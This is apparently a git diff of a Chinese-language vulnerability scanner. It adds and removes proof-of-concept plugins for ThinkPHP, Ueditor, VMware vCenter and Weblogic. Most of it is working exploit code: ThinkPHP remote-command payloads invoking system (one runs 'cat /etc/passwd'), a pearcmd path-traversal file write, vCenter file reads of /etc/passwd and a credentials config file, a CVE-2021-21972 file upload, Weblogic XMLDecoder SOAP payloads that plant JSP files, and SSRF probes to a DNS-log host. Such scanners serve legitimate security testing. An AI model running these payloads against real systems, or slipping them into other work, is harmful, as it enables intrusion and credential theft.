+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'RCE',
+            'vul_id': 'CNNVD-201901-445',
+        }
+
+        for payload in self.payloads:
+            randomStr = random_md5(6)
+            RCEcommand = 'echo ' + randomStr
+            
+            path = payload['path']
+            data = payload['data'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, randomStr)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
+def cnnvd_201901_445_scan(clients):
+    ''' '''
diff --git a/payloads/ThinkPHP/thinkphp-cnvd-2018-24942-rce.py b/payloads/ThinkPHP/thinkphp-cnvd-2018-24942-rce.py
new file mode 100644
index 0000000..109363e
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-cnvd-2018-24942-rce.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP5 未开启强制路由RCE
+    CNVD-2018-24942
+        Payload: https://bbs.zkaq.cn/t/5636.html
+
+ThinkPHP5 未开启强制路由RCE
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?s=index/\\think\Request/input&filter[]=system&data={RCECOMMAND}'},
+            {'path': 'index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}'},
+            {'path': 'index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}'},
+            {'path': 'index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'RCE',
+            'vul_id': 'CNVD-2018-24942',
+        }
+
+        for payload in self.payloads:
+            randomStr = random_md5(6)
+            RCEcommand = 'echo ' + randomStr
+            
+            path = payload['path'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, randomStr) 
+                or (('PHP Version' in res.text) 
+                    and ('PHP License' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ThinkPHP/thinkphp-cnvd-2022-86535-rce.py b/payloads/ThinkPHP/thinkphp-cnvd-2022-86535-rce.py
new file mode 100644
index 0000000..84c78d8
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-cnvd-2022-86535-rce.py
@@ -0,0 +1,113 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP 多语言RCE
+    CNVD-2022-86535
+        Payload: https://mp.weixin.qq.com/s/jECbQ4KodbCrEvoCQFSosw
+
+如果 Thinkphp 程序开启了多语言功能, 
+    攻击者可以通过 get、header、cookie 等位置传入参数, 实现目录穿越+文件包含, 
+    通过pearcmd文件包含这个trick即可实现RCE
+        v6.0.1 < Thinkphp < v6.0.13,
+        Thinkphp v5.0.x,
+        Thinkphp v5.1.x,
+'''
+
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5, random_int_1
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        baseHeaders = config.get('headers')
+
+        if baseHeaders.get('Cookie'):
+            cookie_payload = 'think_lang=../../../../../../../../usr/local/lib/php/pearcmd'
+            new_cookie = baseHeaders.get('Cookie') + '; ' + cookie_payload
+        else:
+            new_cookie = 'think_lang=../../../../../../../../usr/local/lib/php/pearcmd'
+
+        self.payloads = [
+            {
+                'path-1': 'index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {},
+                'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+            {
+                'path-1': 'public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {},
+                'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+            {
+                'path-1': 'index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {'think-lang': '../../../../../../../../usr/local/lib/php/pearcmd'},
+                'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+            {
+                'path-1': 'public/index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {'think-lang': '../../../../../../../../usr/local/lib/php/pearcmd'},
+                'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+            {
+                'path-1': 'index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {'Cookie': new_cookie},
+                'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+            {
+                'path-1': 'public/index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
+                'headers-1': {'Cookie': new_cookie},
+                'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
+            },
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'RCE',
+            'vul_id': 'CNVD-2022-86535',
+        }
+
+        for payload in self.payloads:
+            randomNum = random_int_1(6)
+            randomFileName = random_md5()
+
+            path_1 = payload['path-1'].format(NUM=randomNum, FILENAME=randomFileName)
+            headers_1 = payload['headers-1']
+            path_2 = payload['path-2'].format(FILENAME=randomFileName)
+
+            res1 = hackClient.request(
+                'get',
+                path_1,
+                headers=headers_1,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            res2 = hackClient.request(
+                'get',
+                path_2,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            md = md5(str(randomNum), 32)
+            if (md in res2.text):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ThinkPHP/thinkphp-cve-2018-1002015-rce.py b/payloads/ThinkPHP/thinkphp-cve-2018-1002015-rce.py
new file mode 100644
index 0000000..6784a5e
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-cve-2018-1002015-rce.py
@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP5.x 远程代码执行
+    CVE-2018-1002015
+        Payload: https://www.cnblogs.com/defyou/p/15762860.html
+
+ThinkPHP 5.0.23及5.1.31以下版本RCE
+    ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞, 
+    该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,
+    远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'index.php?s=index/\\think\\Container/invokefunction',
+                'data': 'function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}',
+            },
+            {
+                'path': 'index.php?s=index/\\think\\Container/invokefunction',
+                'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
+            },
+            {
+                'path': 'index.php?s=index/\\think\\Container/invokefunction',
+                'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2018-1002015',
+        }
+
+        for payload in self.payloads:
+            randomStr = random_md5(6)
+            RCEcommand = 'echo ' + randomStr
+            
+            path = payload['path']
+            data = payload['data'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, randomStr)
+                or check.check_res_fileread(res.text)
+                or (('PHP Version' in res.text) 
+                    and ('PHP License' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Ueditor/main.py b/payloads/Ueditor/main.py
deleted file mode 100644
index 44b8200..0000000
--- a/payloads/Ueditor/main.py
+++ /dev/null
@@ -1,29 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    Ueditor扫描类: 
-        ueditor编辑器 SSRF漏洞
-            暂无编号
-                Payload: https://baizesec.github.io/bylibrary/%E6%BC%8F%E6%B4%9E%E5%BA%93/02-%E7%BC%96%E8%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9E/Ueditor/Ueditor%E7%BC%96%E8%BE%91%E5%99%A81.4.3.3%E7%89%88%E6%9C%ACssrf%E6%BC%8F%E6%B4%9E/
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Ueditor.ssrf import ssrf_scan
-
-class Ueditor():
-    def __init__(self):
-        self.app_name = 'Ueditor'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=ssrf_scan, clients=clients)
-        ]
-
-ueditor = Ueditor()
diff --git a/payloads/Ueditor/ssrf.py b/payloads/Ueditor/ssrf.py
deleted file mode 100644
index 8104447..0000000
--- a/payloads/Ueditor/ssrf.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-randomFileName = random_md5(6)
-
-ueditor_ssrf_payloads = [
-    {'path': 'ueditor/php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'ueditor/jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'ueditor/asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'ueditor/net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'UEditor/php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'UEditor/jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'UEditor/asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'UEditor/net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-    {'path': 'net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
-]
-
-def ssrf_scan(clients):
-    ''' 该接口用于抓取远程图片, 如果没有进行过滤, 则可以请求任意url地址 '''
-    client = clients.get('reqClient')
-    sessid = 'ed446d2ac00eae0a1aed7c3aa45479d1'
-
-    vul_info = {
-        'app_name': 'Ueditor',
-        'vul_type': 'SSRF',
-        'vul_id': 'ueditor-ssrf',
-    }
-
-    for payload in ueditor_ssrf_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].format(DNSDOMAIN=dns_domain, FILENAME=randomFileName)
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-
-        sleep(3)                                                # * dns查询可能较慢, 等一会
-        if ((dns.result(md, sessid))):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res,
-            }
-            return results
-    return None
diff --git a/payloads/Ueditor/ueditor-ssrf.py b/payloads/Ueditor/ueditor-ssrf.py
new file mode 100644
index 0000000..08c438b
--- /dev/null
+++ b/payloads/Ueditor/ueditor-ssrf.py
@@ -0,0 +1,70 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Ueditor编辑器 SSRF漏洞
+    暂无编号
+        Payload: https://baizesec.github.io/bylibrary/%E6%BC%8F%E6%B4%9E%E5%BA%93/02-%E7%BC%96%E8%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9E/Ueditor/Ueditor%E7%BC%96%E8%BE%91%E5%99%A81.4.3.3%E7%89%88%E6%9C%ACssrf%E6%BC%8F%E6%B4%9E/
+
+该接口用于抓取远程图片, 如果没有进行过滤, 则可以请求任意url地址
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.randomFileName = random_md5(6)
+
+        self.payloads = [
+            {'path': 'ueditor/php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'ueditor/jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'ueditor/asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'ueditor/net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'UEditor/php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'UEditor/jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'UEditor/asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'UEditor/net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'php/controller.php?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'jsp/controller.jsp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'asp/controller.asp?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+            {'path': 'net/controller.ashx?action=catchimage&source[]=http://{DNSDOMAIN}/{FILENAME}.jpg'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'ed446d2ac00eae0a1aed7c3aa45479d1'
+
+        vul_info = {
+            'app_name': 'Ueditor',
+            'vul_type': 'SSRF',
+            'vul_id': 'ueditor-ssrf',
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].format(DNSDOMAIN=dns_domain, FILENAME=self.randomFileName)
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+
+            if ((dns.result(md, sessid))):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/VMware/test.tar b/payloads/VMware/test.tar
new file mode 100644
index 0000000..de399c5
Binary files /dev/null and b/payloads/VMware/test.tar differ
diff --git a/payloads/VMware/vmware-vcenter-2020-10-fileread.py b/payloads/VMware/vmware-vcenter-2020-10-fileread.py
new file mode 100644
index 0000000..97f8339
--- /dev/null
+++ b/payloads/VMware/vmware-vcenter-2020-10-fileread.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+VMware vCenter 任意文件读取 (2020年)
+    暂无编号
+        Payload: https://blog.csdn.net/caiqiiqi/article/details/109092083
+                 https://github.com/zhzyker/vulmap/blob/main/payload/Vmware.py
+
+VMware vCenter特定版本存在任意文件读取漏洞
+    攻击者可通过向受影响主机发送特制请求来利用此漏洞
+    成功利用此漏洞的攻击者可在目标服务器上读取任意文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * Linux
+            {'path': 'eam/vib?id=/etc/passwd'},
+            {'path': 'vib?id=/etc/passwd'},
+            # * Windows
+            {'path': 'eam/vib?id=C:\\Windows\\System32\\drivers\\etc\\hosts'},
+            {'path': 'vib?id=C:\\Windows\\System32\\drivers\\etc\\hosts'},
+            {'path': 'eam/vib?id=C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'},
+            {'path': 'vib?id=C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'},
+            # * vcenter config file
+            {'path': 'eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties'},
+            {'path': 'vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties'},
+            {'path': 'eam/vib?id=C:\\\\ProgramData\\\\VMware\\\\vCenterServer\\\\cfg\\\\vmware-vpx\\\\vcdb.properties'},
+            {'path': 'vib?id=C:\\\\ProgramData\\\\VMware\\\\vCenterServer\\\\cfg\\\\vmware-vpx\\\\vcdb.properties'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'VMware-vCenter',
+            'vul_type': 'FileRead',
+            'vul_id': 'vcenter-2020-10-fileread',
+        }
+        
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)
+                or (r"driver" in res.text and r"username" in res.text and r"password" in res.text)
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/VMware/vmware-vcenter-cve-2021-21972-fileupload-rce.py b/payloads/VMware/vmware-vcenter-cve-2021-21972-fileupload-rce.py
new file mode 100644
index 0000000..11f0f5b
--- /dev/null
+++ b/payloads/VMware/vmware-vcenter-cve-2021-21972-fileupload-rce.py
@@ -0,0 +1,100 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+VMware vSphere Client RCE (vCenter 6.5-7.0 RCE)
+    CVE-2021-21972
+        Payload: https://cloud.tencent.com/developer/article/1851605
+                 https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/
+
+vSphere Client
+    （HTML5在vCenter Server 插件中存在一个远程执行代码漏洞，
+    未授权的攻击者可以通过开放443端口的服务器向vCenterServer发送精心构造的请求，
+    从而在服务器上写入webshell，最终造成远程任意代码执行
+'''
+
+from lib.initial.config import config
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * Linux Payload
+            {
+                'path': 'ui/vropspluginui/rest/services/uploadova',
+                'file': 'payloads/VMware/test.tar',
+            },
+            # { # 暂不支持
+            #     'path': 'ui/vropspluginui/rest/services/uploadova',
+            #     'file': 'payloads/VMware/Linux.tar',
+            # },
+            # # * Windows Payload # 暂不支持
+            # {
+            #     'path': 'ui/vropspluginui/rest/services/uploadova',
+            #     'file': 'payloads/VMware/Windows.tar',
+            # },
+            # * Response status_code == 405
+            {
+                'path': 'ui/vropspluginui/rest/services/uploadova',
+                'file': '',
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'VMware-vCenter',
+            'vul_type': 'RCE/Upload',
+            'vul_id': 'CVE-2021-21972',
+        }
+        
+        headers = config.get('headers', {}).copy()
+        del headers['Content-Type']
+        
+        for payload in self.payloads:
+            path = payload['path']
+            file = payload['file']
+
+            if file:
+                # * 文件上传测试
+                files = {'uploadFile': open(file, 'rb')}
+                res = client.request(
+                    'post',
+                    path,
+                    cover_headers=headers,
+                    files=files,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+            else:
+                # * 只检测响应状态是否为405
+                res = client.request(
+                    'get',
+                    path,
+                    allow_redirects=False,
+                    vul_info=vul_info
+                )
+                if res is None:
+                    continue
+
+            if (
+                (res.status_code == 200 and "SUCCESS" in res.text)
+                or (res.status_code == 405)
+            ):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Exploit': 'https://github.com/NS-Sp4ce/CVE-2021-21972/',
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Weblogic/cve_2014_4210.py b/payloads/Weblogic/cve_2014_4210.py
deleted file mode 100644
index 8546ac8..0000000
--- a/payloads/Weblogic/cve_2014_4210.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2014_4210_payloads = [
-    {'path': 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://DNSDOMAIN/&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'},
-    {'path': 'SearchPublicRegistries.jsp?operator=http://DNSDOMAIN/&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'}
-]
-
-def cve_2014_4210_scan(clients):
-    ''' Weblogic uddiexplorer SSRF漏洞
-            uddiexplorer组件的SearchPublicRegistries.jsp页面存在一个SSRF漏洞
-    '''
-    client = clients.get('reqClient')
-    sessid = '0fe976335bbe903a97650f15dcb0ce47'
-
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'SSRF',
-        'vul_id': 'CVE-2014-4210',
-    }
-
-    for payload in cve_2014_4210_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                        # * dns查询可能较慢, 等一会
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Weblogic/cve_2017_10271.py b/payloads/Weblogic/cve_2017_10271.py
deleted file mode 100644
index 9314088..0000000
--- a/payloads/Weblogic/cve_2017_10271.py
+++ /dev/null
@@ -1,85 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2017_10271_payloads = [
-    {
-        'path-1': 'wls-wsat/CoordinatorPortType',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
-        'path-2': 'wls-wsat/{FILENAME}.jsp',
-    },
-    {
-        'path-1': 'wls-wsat/CoordinatorPortType',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
-        'path-2': 'wls-wsat/{FILENAME}.jsp',
-    },
-        {
-        'path-1': 'CoordinatorPortType',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
-        'path-2': '{FILENAME}.jsp',
-    },
-    {
-        'path-1': 'CoordinatorPortType',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/9j4dqk/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[<% out.println("<h1>{RCEMD}</h1>"); %>]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''',
-        'path-2': '{FILENAME}.jsp',
-    },
-]
-
-def cve_2017_10271_scan(clients):
-    ''' Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞
-            < 10.3.6
-            Weblogic的WLS Security组件对外提供webservice服务, 其中使用了XMLDecoder来解析用户传入的XML数据, 在解析的过程中出现反序列化漏洞, 导致可执行任意命令
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'Weblogic',
-        'vul_type': 'unSerialization',
-        'vul_id': 'CVE-2017-10271',
-    }
-
-    headers = {
-        'Content-Type': 'text/xml'
-    }
-
-    for payload in cve_2017_10271_payloads:
-        randomFileName = random_md5()
-        randomStr = random_md5()
-        
-        path_1 = payload['path-1']
-        data_1 = payload['data-1'].format(FILENAME=randomFileName, RCEMD=randomStr)
-        path_2 = payload['path-2'].format(FILENAME=randomFileName)
-
-        res1 = client.request(
-            'post',
-            path_1,
-            data=data_1,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        sleep(3)                    # * 延时, 因为命令执行生成文件可能有延迟, 要等一会判断结果才准确
-        
-        res2 = client.request(
-            'get',
-            path_2,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-        
-        if ((res2.status_code == 200) and (randomStr in res2.text)):
-            results = {
-                'Target': res1.request.url,
-                'Verify': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2,
-            }
-            return results
-    return None
diff --git a/payloads/Weblogic/cve_2019_2725.py b/payloads/Weblogic/cve_2019_2725.py
deleted file mode 100644
index 910fb87..0000000
--- a/payloads/Weblogic/cve_2019_2725.py
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2019_2725_payloads = [
-    {
-        'path-1': '_async/AsyncResponseService',
-        'data-1': '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/{FILENAME}.jsp</string><void method="println"><string><![CDATA[
-<% out.println("<h1>{RCEMD}</h1>"); %>]]>
